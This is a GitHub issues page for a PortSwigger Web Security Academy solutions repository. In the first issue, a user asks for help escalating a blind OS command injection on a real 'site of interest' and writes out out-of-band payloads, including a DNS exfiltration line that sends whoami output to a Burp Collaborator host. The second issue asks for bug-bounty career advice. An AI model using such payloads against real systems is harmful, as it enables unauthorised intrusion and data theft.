
portswigger-websecurity-academy's Issues

out-of-band data exfiltration Command Injection

A few days ago I found a vulnerability in a site of interest through the Burp Suite scanner, using the nslookup xxx.burpcolaborator.com exploit, with the following features:

Issue: OS command injection
Severity: High
Confidence: Certain

The vulnerability only responds when using ` and only responds to nslookup, sleep and ping, including the Burp Collaborator.

These are the only commands it responds to.

nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10

Other commands like nslookup $(whoami).xxx.burp collaborator.com do not give any answer. Please, I would appreciate it if you could help me with this problem, since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.

I await your response.
Thanx

Information

Hello Frank Leitner, very nice to meet you. I'm Luis Fernando Mendoza from Mexico. I'm a software engineer with more than 6 years of experience in the field of web development and I'm starting out in the cybersecurity world. I was reading the description of this repository and I'm also following the video tutorials of Rana Khalil. I was wondering if you have some advice for me: I'm trying to enter the world of bug bounty, so how was your approach into this field, what things should I keep in mind when entering this field, etc. I'm very passionate about these topics, thank you in advance!

PS: I sent a LinkedIn invitation, thank you!
